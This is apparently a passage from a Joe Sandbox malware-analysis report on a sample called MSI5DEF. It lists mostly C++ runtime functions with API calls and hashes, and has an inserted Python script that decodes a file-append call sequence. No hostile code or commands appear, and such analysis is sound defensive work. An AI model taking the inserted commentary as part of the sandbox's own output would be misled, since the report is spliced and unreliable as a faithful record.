                                                                        • Instruction ID: c0007d8d193ef31609ba186fa6cc7221cab7cd19299ca5720971f10bd9a4f3b0
                                                                        • Opcode Fuzzy Hash: ee3e39a898dba5b9377efa791c7a8482a5d8cdb0e4a71c6b04dd1bf5cc6df57b
                                                                        • Instruction Fuzzy Hash: 7BC1347190024D9FDF15DFE8C980AFEBBB9EB48310F24441AFA05AB251D734AE45CBA1
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00B04F27
                                                                        • collate.LIBCPMT ref: 00B04F33
                                                                          • Part of subcall function 00B03E70: __EH_prolog3_GS.LIBCMT ref: 00B03E77
                                                                          • Part of subcall function 00B03E70: __Getcoll.LIBCPMT ref: 00B03EDB
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • __Getcoll.LIBCPMT ref: 00B04F76
                                                                          • Part of subcall function 00B03CD4: __EH_prolog3.LIBCMT ref: 00B03CDB
                                                                          • Part of subcall function 00B03CD4: std::_Lockit::_Lockit.LIBCPMT ref: 00B03CE5
                                                                          • Part of subcall function 00B03CD4: std::_Lockit::~_Lockit.LIBCPMT ref: 00B03D56
                                                                          • Part of subcall function 00AF4403: __EH_prolog3.LIBCMT ref: 00AF440A
                                                                          • Part of subcall function 00AF4403: std::_Lockit::_Lockit.LIBCPMT ref: 00AF4414
                                                                          • Part of subcall function 00AF4403: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF44BB
                                                                        • numpunct.LIBCPMT ref: 00B051A6
                                                                          • Part of subcall function 00AE84C0: LocalAlloc.KERNEL32(00000040,00000000,00B0839D,00000000,1816BA6E,?,00000000,?,00000000,?,00B2CB8D,000000FF,?,00AE17D5,00000000,00B2D3BA), ref: 00AE84C6
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_$Getcoll$AllocH_prolog3_Localcollatenumpunct
                                                                        • String ID:
                                                                        • API String ID: 2732324234-0
                                                                        • Opcode ID: ed270abddae933db0ff3d992346d9f24b2784827d1011d883287b0685052e152
                                                                        • Instruction ID: 74bca2dde93c6f72de414169e0fc4bb8b3bdc34eb648b35f751de32d0bcfa096
                                                                        • Opcode Fuzzy Hash: ed270abddae933db0ff3d992346d9f24b2784827d1011d883287b0685052e152
                                                                        • Instruction Fuzzy Hash: 9B9108B2C04616ABD731ABA58906B7F7EE8EF85750F10459DF959A72C1EF308D008BE1
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPointer
                                                                        • String ID:
                                                                        • API String ID: 1740715915-0
                                                                        • Opcode ID: 02efc162ffbf20b8255ab3c60f6f906136d790ac5806733013e9592742e706a2
                                                                        • Instruction ID: 9fd69109de39a1ce92e54e2f5539b5bdfd35c0adb4238f8385c94ba7fbdc0bd1
                                                                        • Opcode Fuzzy Hash: 02efc162ffbf20b8255ab3c60f6f906136d790ac5806733013e9592742e706a2
                                                                        • Instruction Fuzzy Hash: 7B51AC72601606AFEB298F54D891F6A7BE4FF04310F1445A9EC52972E1EB32ED91CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d0b3ec3a0dfdb54d6d52626f6d08431120c995e888b5cb0a417cf0b3b3683cec
                                                                        • Instruction ID: c65f06a20be8307db0db17e5a9cbee8858ff2c0a75e515c8b50894df96edd4e5
                                                                        • Opcode Fuzzy Hash: d0b3ec3a0dfdb54d6d52626f6d08431120c995e888b5cb0a417cf0b3b3683cec
                                                                        • Instruction Fuzzy Hash: 3A218E7124C205AFDB20AF71C890DAB7BF9EF0036879045A5F915D7641EF31EC8087A0
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000000,00000000,75EF5490,00AE8B3A,00000000,?,?,?,?,?,?,?,00000000,00B2A285,000000FF), ref: 00AE9027
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast
                                                                        • String ID: > returned:$Call to ShellExecute() for verb<$Last error=
                                                                        • API String ID: 1452528299-1781106413
                                                                        • Opcode ID: 83f2496090b6c5105aec201d66362fd9fb28915ee67f80471d075075ad21c244
                                                                        • Instruction ID: 843774d9db1d2746f412d3ad423fb3078d409cce617c698b49700ba6529b88cf
                                                                        • Opcode Fuzzy Hash: 83f2496090b6c5105aec201d66362fd9fb28915ee67f80471d075075ad21c244
                                                                        • Instruction Fuzzy Hash: 6E218E49A202A186CB701F2E841173AA2F0EF54755F65046FD9C9D7395FB698D81C391
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF440A
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF4414
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF44BB
                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00AF44C6
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Concurrency::cancel_current_taskH_prolog3Lockit::_Lockit::~_
                                                                        • String ID:
                                                                        • API String ID: 4244582100-0
                                                                        • Opcode ID: 920b2d050763163aeab045f7bf442643aea1ce74e0c6438154855ee5cc602fbe
                                                                        • Instruction ID: f1b9e904792d446baeb370bdd7f12902194c80c4d0d25325081e9e61558ff160
                                                                        • Opcode Fuzzy Hash: 920b2d050763163aeab045f7bf442643aea1ce74e0c6438154855ee5cc602fbe
                                                                        • Instruction Fuzzy Hash: 42212A34A0061A9FCB14EF54C891A69B7A1FF49711F008459EA16AB3A1DF30ED51CF80
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,1816BA6E), ref: 00AF143C
                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00AF145C
                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00AF148D
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00AF14A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                         • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandlePointerWrite
                                                                        • String ID:
                                                                        • API String ID: 3604237281-0
                                                                        • Opcode ID: 8623a7c4611b1767cf5a81e334a4dba51bd19af2eaf444a4b1429496f95271ce
                                                                        • Instruction ID: fb78ad9ec5b74fe0a5d601594a1a5fb9ccf1f7b913d87a93b955c89601c03503
                                                                        • Opcode Fuzzy Hash: 8623a7c4611b1767cf5a81e334a4dba51bd19af2eaf444a4b1429496f95271ce
                                                                        • Instruction Fuzzy Hash: 6F21AF71940318EBD7208F54DC09FABBBF8EB45B24F204259F600A72D0DBB45A058BA4
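The four calls listed in this block (CreateFileW with access 40000000, share 00000001, disposition 00000004 and attributes 00000080, then SetFilePointer with move method 00000002, WriteFile and CloseHandle) are the standard Win32 idiom for appending to a file that is created if missing. The script below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses lines in the report's "Api.Module(args), ref: addr" format, drops the extra stack slots the sandbox prints past each API's real arity, names the Win32 constants, and labels the sequence. The sample input is the four lines of this block; the arity and constant tables are assumptions limited to the APIs the block uses.

```python
import re

# Constructed sample input: the four API lines of this report block, in
# Joe Sandbox's "Api.Module(arg,arg,...), ref: addr" text format.
SAMPLE_LINES = [
    "CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,1816BA6E), ref: 00AF143C",
    "SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00AF145C",
    "WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00AF148D",
    "CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00AF14A6",
]

LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Parameter counts from the Win32 prototypes (assumed table, only the APIs in
# this block). The sandbox prints more stack slots than the callee takes;
# everything past the real arity is discarded.
ARITY = {"CreateFileW": 7, "SetFilePointer": 4, "WriteFile": 5, "CloseHandle": 1}

# Win32 constants from winnt.h / fileapi.h; the tables are deliberately short.
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
          0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
ATTRS = {0x2: "FILE_ATTRIBUTE_HIDDEN", 0x80: "FILE_ATTRIBUTE_NORMAL",
         0x100: "FILE_ATTRIBUTE_TEMPORARY", 0x4000000: "FILE_FLAG_DELETE_ON_CLOSE"}
MOVE_METHOD = {0: "FILE_BEGIN", 1: "FILE_CURRENT", 2: "FILE_END"}


def parse_api_line(line):
    """Split one report line into (api, module, args, ref); '?' (unresolved) becomes None."""
    m = LINE_RE.match(line.strip())
    if m is None:
        raise ValueError("not a Joe Sandbox API line: %r" % line)
    api = m.group("api")
    raw = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    raw = raw[: ARITY.get(api, len(raw))]
    args = [None if a == "?" else int(a, 16) for a in raw]
    return api, m.group("mod"), args, int(m.group("ref"), 16)


def decode_flags(value, table):
    """Expand a bitmask into known flag names; any unknown bits are kept as hex."""
    if value is None:
        return "?"
    names = [name for bit, name in table.items() if value & bit]
    known = sum(bit for bit in table if value & bit)
    leftover = value & ~known
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) if names else "0"


def describe_call(api, args):
    """Render a call with its constants named, for the APIs this block uses."""
    if api == "CreateFileW":
        _name, access, share, _sa, disp, attrs, _template = args
        return "CreateFileW(access=%s, share=%s, disposition=%s, attrs=%s)" % (
            decode_flags(access, ACCESS), decode_flags(share, SHARE),
            DISPOSITION.get(disp, disp), decode_flags(attrs, ATTRS))
    if api == "SetFilePointer":
        _h, dist, _high, method = args
        return "SetFilePointer(distance=%s, method=%s)" % (dist, MOVE_METHOD.get(method, method))
    return api + "(...)"


def classify_sequence(lines):
    """Name the file-I/O pattern a block's API sequence implements.

    Returns {'calls': [decoded call strings], 'pattern': one of
    'append', 'overwrite', 'write', 'read', 'other'}.
    """
    calls = [parse_api_line(l) for l in lines]
    decoded = [describe_call(api, args) for api, _m, args, _r in calls]
    apis = [c[0] for c in calls]
    pattern = "other"
    create = next((c for c in calls if c[0] == "CreateFileW"), None)
    if create is not None:
        access, disp = create[2][1], create[2][4]
        writes = "WriteFile" in apis and access is not None and access & 0x40000000
        # SetFilePointer(0, FILE_END) before the write is what makes it an append.
        seek_end = any(c[0] == "SetFilePointer" and c[2][3] == 2 for c in calls)
        if writes and seek_end:
            pattern = "append"
        elif writes and disp in (2, 5):
            pattern = "overwrite"
        elif writes:
            pattern = "write"
        elif access is not None and access & 0x80000000:
            pattern = "read"
    return {"calls": decoded, "pattern": pattern}


if __name__ == "__main__":
    result = classify_sequence(SAMPLE_LINES)
    for call in result["calls"]:
        print(call)
    print("pattern:", result["pattern"])
```

Run on the block above it reports disposition OPEN_ALWAYS (create if absent, otherwise open without truncating) plus a seek to FILE_END before WriteFile, so the function appends rather than overwrites; the file name itself is unresolved ("?") in the report, so the target path has to come from the dynamic file-activity section, not from this block.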
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF80CC
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF80D6
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF8127
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF8147
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                         • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 25ae2f903c5b81531d2722e7b1363c62ebc95d07ca118ff0f3a88157f80ece5f
                                                                        • Instruction ID: bdf8c598e834402f7de51c7320f99385379837945fede8a5b8b8debbd0180ee4
                                                                        • Opcode Fuzzy Hash: 25ae2f903c5b81531d2722e7b1363c62ebc95d07ca118ff0f3a88157f80ece5f
                                                                        • Instruction Fuzzy Hash: 3E01D27590065DDBCF01EBA4C9456BE7BB1AF84710F240609F6206B3D2DF349E02CB95
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF81F6
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF8200
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF8251
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF8271
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                         • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 28f515215426ada08b7a09e9844f5572cd0d737ebf0afe71d760900020b762a2
                                                                        • Instruction ID: 743e53f037df1ab92bbc62e0531793f9719e1c00588a5e81536fbf2de8ce4d3d
                                                                        • Opcode Fuzzy Hash: 28f515215426ada08b7a09e9844f5572cd0d737ebf0afe71d760900020b762a2
                                                                        • Instruction Fuzzy Hash: B301C43694061D8BCB01EBE4C9456BE77B1BF84310F240409FA2067291DF34AF018B90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF8161
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF816B
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF81BC
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF81DC
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                         • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 3ea00b2d90c19b3aba22369957fe2ba328488c715ae558076ba4fd9e583c8271
                                                                        • Instruction ID: 261a7fb301ba5f299534fefdc3c33e3f0fa69a0d3a428f8104866be71a87babb
                                                                        • Opcode Fuzzy Hash: 3ea00b2d90c19b3aba22369957fe2ba328488c715ae558076ba4fd9e583c8271
                                                                        • Instruction Fuzzy Hash: D301C07690061D9BCB05EBA4C9497BE7BA1BF88320F240609F6116B392CF349E029B95
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF2700
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF270A
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF275B
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF277B
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                         • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 27d8d2d034e38f52ab16c7914e8146cb2ea18d8f301c86f345cbab560a73b4d7
                                                                        • Instruction ID: 2947d2c33c47c2875bfeb74455f13be7512d11789685fc20579bf987d0e0f9cf
                                                                        • Opcode Fuzzy Hash: 27d8d2d034e38f52ab16c7914e8146cb2ea18d8f301c86f345cbab560a73b4d7
                                                                        • Instruction Fuzzy Hash: 0D01807590065D9BCB05FBE4C9557BEBBA1AF98310F240549F6206B291DF349E029B90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF2795
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF279F
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF27F0
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF2810
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                         • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 1b7c711ca91e5d18abef545fc26e3ae323036e24de39a2c0b929c12ca84d3006
                                                                        • Instruction ID: 07cc855273a8adadf8edd6b05f07f0b0370f8e6b2f0ea24724e93a9f0455b4cf
                                                                        • Opcode Fuzzy Hash: 1b7c711ca91e5d18abef545fc26e3ae323036e24de39a2c0b929c12ca84d3006
                                                                        • Instruction Fuzzy Hash: 6701CC3690061D9BCB05FBE4D905BBE7BA1BF84320F240409F611AB2D2DF349E028BD0
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00B039F2
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00B039FC
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00B03A4D
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00B03A6D
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                         • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: a1ecc8905d8b4f9f8353fc5e9f50e77c4dab5c1763e252f6624ab3ac78f2f0b3
                                                                        • Instruction ID: 64ce6f9f9e4c9e2b79a46a0ad02d8890fdf9065e9a36bb8ff91c49dbb066f744
                                                                        • Opcode Fuzzy Hash: a1ecc8905d8b4f9f8353fc5e9f50e77c4dab5c1763e252f6624ab3ac78f2f0b3
                                                                        • Instruction Fuzzy Hash: D001AD769006199FCB01EBA8C9496BE7BE5AF84710F244049F5106B2D1DF349F068B90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF79D0
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF79DA
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7A2B
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7A4B
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                         • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 142de9284f3aae6922fdd6b162f95d24be45503fdda01aecdc9827d0c88ba43d
                                                                        • Instruction ID: 49237b5109ca427cb71e9be58ca1c40b691a4afd084da8468659439c891dbf86
                                                                        • Opcode Fuzzy Hash: 142de9284f3aae6922fdd6b162f95d24be45503fdda01aecdc9827d0c88ba43d
                                                                        • Instruction Fuzzy Hash: 9701D23690466DDFCB11FBA4D9456BE7BB1AF84310F250449F620AB2D2CF349F018B91
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00B03A87
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00B03A91
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00B03AE2
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00B03B02
                                                                        Memory Dump Source
